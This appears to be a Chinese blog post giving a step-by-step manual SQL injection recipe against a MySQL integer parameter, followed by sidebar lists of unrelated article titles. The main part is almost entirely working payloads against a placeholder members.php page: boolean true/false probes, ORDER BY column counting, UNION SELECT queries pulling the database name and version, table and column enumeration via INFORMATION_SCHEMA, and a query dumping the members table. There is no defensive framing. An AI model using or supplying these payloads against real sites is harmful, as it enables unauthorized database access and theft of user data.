MySQL整形手工注入
0x1 判断注入点:
http://www.xxx.org/members.php?id=1 and 1=1 --+ # ture
http://www.xxx.org/members.php?id=1 and 1=2 --+ # fase
0x2 枚举当前的列
http://www.xxx.org/members.php?id=1 order by 5 #false
http://www.xxx.org/members.php?id=1 order by 4 $true
0x3 枚举当前字段,让其报错
http://www.xxx.org/members.php?id=-1 union select 1,2,3,4
0x4 获取当前数据库信息
http://www.xxx.org/members.php?id=-1 union select 1,database(),3,version()
database: db83231_asfaa
0x5 获取当前库的表
http://www.xxx.org/members.php?id=-1 +UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE())
0x6 获取members表的列
http://www.xxx.org/members.php?id=-1 +UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6d656d62657273)
0x7 获取字段数据
http://www.xxx.org/members.php?id=-1 +UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(id,nome,imagem,texto+SEPARATOR+0x3c62723e)+FROM+members)
最新文章
- css框架
- 《DSP using MATLAB》示例Example5.8
- php中创建和调用webservice接口示例
- 【iCore3 双核心板_FPGA】例程六:计数器实验——计数器使用
- LintCode ";Delete Digits";
- 关于C#中文本模板(.tt)的简单应用
- ASP.NET中Json的处理
- HDU 2510 - 符号三角形
- JavaMail学习笔记(七)、帐号激活与忘记密码 实例(zhuan)
- Android自己定义组件系列【5】——高级实践(1)
- Matlab.NET混合编程调用Figure窗体
- 细谈昆明SEO市场
- 关于CSS的table-layout属性的用法详解
- 剑指Offer——咪咕笔试题+知识点总结
- ceph简单用户管理
- ajax原生实现
- python(leetcode)-重复元素算法题
- windows server 2012 流媒体服务器搭建(直播与点播)
- 151. Reverse Words in a String翻转一句话中的单词
- Testing - 软件测试知识梳理 - 相关词汇
热门文章
- ABP进阶教程9 - CSV导出中文乱码
- Ubantu搭建虚拟环境
- [PHP] PHP PDO与mysql的连接单例防止超时情况处理
- [PHP] 配置vscode的语法检测消除提示Cannot validate since no PHP executable is set
- Linux 登录 MySQL 报错, 解决bash: mysql: command not found 的方法
- 【bzoj4006】[JLOI2015]管道连接(斯坦纳树+dp)
- DRF的基本使用(一)
- java(android)命名规范
- Docker 简单发布dotnet core项目 图文版
- Linux上error while loading shared libraries问题解决方法